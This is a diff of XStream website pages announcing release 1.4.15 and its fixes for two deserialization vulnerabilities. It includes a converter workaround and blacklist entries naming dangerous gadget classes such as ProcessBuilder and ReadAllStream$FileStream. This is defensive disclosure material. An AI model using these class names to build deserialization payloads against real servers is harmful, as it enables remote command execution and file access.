99 | || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream")); | |
100 | } | |
101 | ||
102 | public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | |
103 | throw new ConversionException("Unsupported type due to security reasons."); | |
104 | } | |
105 | ||
106 | public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { | |
107 | throw new ConversionException("Unsupported type due to security reasons."); | |
108 | } | |
109 | }, XStream.PRIORITY_LOW); | |
110 | </pre></div> | |
111 | ||
112 | <h2 id="credits">Credits</h2> | |
113 | ||
114 | <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p> | |
115 | ||
116 | </body> | |
117 | </html>⏎ |
33 | 33 | <p>Not yet released.</p> |
34 | 34 | --> |
35 | 35 | |
36 | <h1 id="1.4.15">1.4.15</h1> | |
37 | ||
38 | <p>Released December 13, 2020.</p> | |
39 | ||
40 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
41 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
42 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
43 | ||
44 | <h2>Minor changes</h2> | |
45 | ||
46 | <ul> | |
47 | <li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li> | |
48 | <li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li> | |
49 | </ul> | |
50 | ||
51 | <h2>Stream compatibility</h2> | |
52 | ||
53 | <ul> | |
54 | <li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream | |
55 | are now part of the default blacklist and the deserialization of XML containing one of the two types will fail. | |
56 | You will have to enable these types by explicit configuration, if you need them.</li> | |
57 | </ul> | |
58 | ||
59 | <h2>Delivery</h2> | |
60 | ||
61 | <p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will | |
62 | process only requested classes of the jar file. Until version 1.4.14 XStream was delivered also as special Java 7 | |
63 | version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version. However, this | |
64 | special version will not work in a normal Java 8 environment or higher and was never meant do so.</p> | |
65 | ||
66 | <p>Unfortunately, this version has to be build always after the standard version due to the build sequence. The | |
67 | latest version in Maven Central however is always the one that has been deployed last independently from the time | |
68 | of publishing. This creates an annoyance now in GitHub for any project using the Dependabot service which creates | |
69 | automated pull requests with updates to the latest XStream version, because it injects now the special Java 7 | |
70 | version that probably breaks these projects.</p> | |
71 | ||
72 | <p>Users who still require a special version for Java 7 will have to build this artifact now on their own. Users | |
73 | for even older Java environments had always to do so anyway.</p> | |
74 | ||
36 | 75 | <h1 id="1.4.14">1.4.14</h1> |
37 | 76 | |
38 | 77 | <p>Released November 16, 2020.</p> |
45 | 84 | |
46 | 85 | <ul> |
47 | 86 | <li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default |
48 | blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these | |
49 | types by explicit configuration, if you need them.</li> | |
87 | blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable | |
88 | these types by explicit configuration, if you need them.</li> | |
50 | 89 | </ul> |
51 | 90 | |
52 | 91 | <h1 id="1.4.13">1.4.13</h1> |
17 | 17 | |
18 | 18 | <p><a href="versioning.html">About XStream version numbers...</a></p> |
19 | 19 | |
20 | <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1> | |
20 | <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1> | |
21 | 21 | |
22 | 22 | <ul> |
23 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b> | |
23 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b> | |
24 | 24 | Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li> |
25 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b> | |
25 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b> | |
26 | 26 | Contains the complete XStream project as if checked out from the Subversion version tag.</li> |
27 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a> | |
27 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a> | |
28 | 28 | The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li> |
29 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b> | |
29 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b> | |
30 | 30 | The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li> |
31 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b> | |
31 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b> | |
32 | 32 | The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li> |
33 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a> | |
34 | The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li> | |
35 | 33 | </ul> |
36 | 34 | |
37 | 35 | <h1 id="maven">Maven Central Repository</h1> |
42 | 40 | <div class="Source XML"><pre><dependency> |
43 | 41 | <groupId>com.thoughtworks.xstream</groupId> |
44 | 42 | <artifactId>xstream</artifactId> |
45 | <version>1.4.14</version> | |
43 | <version>1.4.15</version> | |
46 | 44 | </dependency></pre></div> |
47 | 45 | |
48 | 46 | <h1 id="previous-releases">Previous Releases</h1> |
72 | 72 | |
73 | 73 | <h1 id="news">Latest News</h1> |
74 | 74 | |
75 | <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2> | |
75 | <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> | |
76 | 76 | |
77 | <p class="highlight">This maintenance release addresses the security vulnerability | |
78 | <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream | |
79 | Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security | |
80 | framework.</p> | |
77 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
78 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
79 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
81 | 80 | |
82 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
81 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
83 | 82 | |
84 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
83 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
85 | 84 | |
86 | 85 | </body> |
87 | 86 | </html> |
14 | 14 | </head> |
15 | 15 | |
16 | 16 | <body> |
17 | ||
18 | <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> | |
19 | ||
20 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
21 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
22 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
23 | ||
24 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
25 | ||
26 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
17 | 27 | |
18 | 28 | <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2> |
19 | 29 |
28 | 28 | |
29 | 29 | <p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting |
30 | 30 | the XML representation of other objects, that were not present at marshalling time. An attacker could take |
31 | advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream | |
32 | process. A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and | |
33 | <a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p> | |
34 | ||
35 | <p>Note that the XML data can be manipulated on different levels. For example, manipulating values on existing | |
36 | objects (such as a price value), or breaking the format and causing the XML parser to fail. The latter case will | |
37 | raise an exception, but the former case must be handled by validity checks in any application which processes | |
38 | user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above. | |
31 | advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the | |
32 | context of the server running the XStream process. Concrete cases are described in | |
33 | <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>, | |
34 | <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p> | |
35 | ||
36 | <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing | |
37 | objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail. | |
38 | The latter case will raise an exception, but the former case must be handled by validity checks in any application | |
39 | which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above. | |
39 | 40 | Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine |
40 | 41 | causing a Denial of Service.</p> |
41 | 42 | |
63 | 64 | |
64 | 65 | <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at |
65 | 66 | well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more |
66 | exploits is very high.</p> | |
67 | ||
68 | <p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security, | |
69 | because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class | |
70 | types are setup explicitly. This will be the default for XStream 1.5.x.</p> | |
67 | exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for | |
68 | attacks.</p> | |
69 | ||
70 | <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security, | |
71 | because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the | |
72 | allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p> | |
71 | 73 | |
72 | 74 | <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to |
73 | 75 | explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to |
90 | 92 | framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to |
91 | 93 | limit the danger of arbitrary command execution if it deserializes data from an external source.</p> |
92 | 94 | |
93 | <p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java | |
94 | runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no | |
95 | <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java | |
96 | runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no | |
95 | 97 | longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream |
96 | 98 | client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist |
97 | 99 | as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer |
120 | 122 | <p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other |
121 | 123 | commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans |
122 | 124 | EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework, |
123 | allowing application developers to define which types are allowed to be unmarshalled with XStream.</p> | |
125 | allowing application developers to define which types are allowed to be unmarshalled with XStream. Use | |
126 | <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a> | |
127 | to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p> | |
124 | 128 | |
125 | 129 | <p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>. |
126 | 130 | The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list |
0 | 0 | <!-- |
1 | 1 | Copyright (C) 2005, 2006 Joe Walnes. |
2 | Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers. | |
2 | Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers. | |
3 | 3 | All rights reserved. |
4 | 4 | |
5 | 5 | The software in this package is published under the terms of the BSD |
44 | 44 | </section> |
45 | 45 | <section> |
46 | 46 | <name>Vulnerabilities</name> |
47 | <page>CVE-2020-26259.html</page> | |
48 | <page>CVE-2020-26258.html</page> | |
47 | 49 | <page>CVE-2020-26217.html</page> |
48 | 50 | <page>CVE-2017-7957.html</page> |
49 | 51 | <page>CVE-2016-3674.html</page> |